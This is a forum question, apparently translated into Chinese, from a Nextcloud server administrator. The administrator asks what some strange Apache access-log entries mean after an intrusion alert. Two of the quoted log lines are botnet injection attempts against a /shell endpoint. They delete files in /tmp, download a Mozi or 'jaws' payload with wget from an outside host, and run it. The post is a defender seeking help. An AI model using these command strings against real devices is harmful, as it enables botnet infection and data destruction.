【发布时间】:2022-10-08 17:38:34
【问题描述】:
我使用 PHP8.1 在 Apache 上运行 Nextcloud24 服务器,我手机上的路由器防火墙/防病毒应用程序通知我 Nextcloud 服务器上的入侵,所以我决定查看访问日志,只看到一堆 GET 请求,但是我发现了几条奇怪的线路。我看到的一个我真的不知道该怎么做的是
[07/Oct/2022:17:42:17 +0000] "\x85\x1cuG\x10\xc3\x0f\x1f@P\x16Vc\x11\xc5L\x90\r\xdb\xe8\xb0)\x99\xe8\n" 400 306
不知道这是什么意思,它看起来像 Linux 的目录树。
但我最好奇的两个是
[07/Oct/2022:14:58:14 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 302 -
&
[07/Oct/2022:01:38:11 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+botnet.psscc.cn/jaws;sh+/tmp/jaws HTTP/1.1" 302 -
知道这个人或其他人想要做什么吗?我在墨子身上发现的唯一东西是关于一个僵尸网络的。
【问题讨论】:
标签: http security webserver nextcloud